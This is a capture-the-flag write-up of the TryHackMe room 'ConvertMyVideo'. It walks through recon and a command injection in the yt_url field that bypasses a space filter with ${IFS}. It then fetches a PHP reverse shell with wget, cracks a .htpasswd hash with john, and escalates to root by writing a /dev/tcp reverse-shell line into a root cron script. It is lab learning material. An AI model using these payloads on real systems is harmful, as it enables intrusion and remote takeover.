ConvertMyVideo on TryHackMe

, , , ,

Before all

Well… I was stucked at the last step of this box, after I searched other’s Write Up, I learned a new tool - pspy which can moniter linux processes without root.

Victim’s IP : 10.10.3.97
Attacker’s IP : 10.9.195.189

Write Up

RECON

port scan

Command: 

1
nmap -sC -sV -PN 10.10.3.97

Result: 

1
2
3
4
5
6
7
8
9
10
11
12
13
Nmap scan report for 10.10.3.97
Host is up (0.34s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
|   256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_  256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nothing special though…

directory enumeration

Command: 

1
dirsearch -u http://10.10.3.97/

Result:
The most interesting part is the admin directory which required http-get auth.

image

Exploitation

command injection

The web page look like this, and after some tries, I found out a vulnerability with command injection.

image

The interesting part is that it would block the space character and cut the post data with &(me crying out loud : is and not end!!!)
Anyway, is still easy to bypass by ${IFS}
Setting up a http server to make victim downloads the php reverse shell. 

1
python3 -m http.server 10000

I opened it on port 10000

Listening on port 1004 and wait for the reverse shell work: 

1
nc -nlvp 1004 #rrrahhh

Command injection payload: 

1
yt_url=;wget${IFS}http://10.9.195.189:10000/reverse.php;

And just visit http://10.10.3.97:10000/reverse.php to get shell on port 1004

password cracking

Well…although I don’t know why I should do this, but I must do this to complete the challenge(

File:/var/www/html/admin/.htpasswd

Content:itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/

Simple crack with john:
Command: 

1
john pass --wordlist=rockyou.txt

Result:

image

Privilege Escalation

pspy

https://github.com/DominicBreuker/pspy

Install it on victim’s machine: 

1
wget http://10.9.195.189:10000/pspy64

And after a while, I noticed that there’s a cronjob run with UID=0, which probably run by root
image

reverse shell again

Base on the cronjob discovered before, I edited the content of clean.sh to get a root’s shell. 

1
echo "sh -i >& /dev/tcp/10.9.195.189/5427 0>&1" > clean.sh

Open port 5427 on my computer: 

1
sudo nc -lvnp 5427

Finally…

Get shell!!!
image

After all

I am still procrastinating on my write up for Year of the Fox on TryHackMe …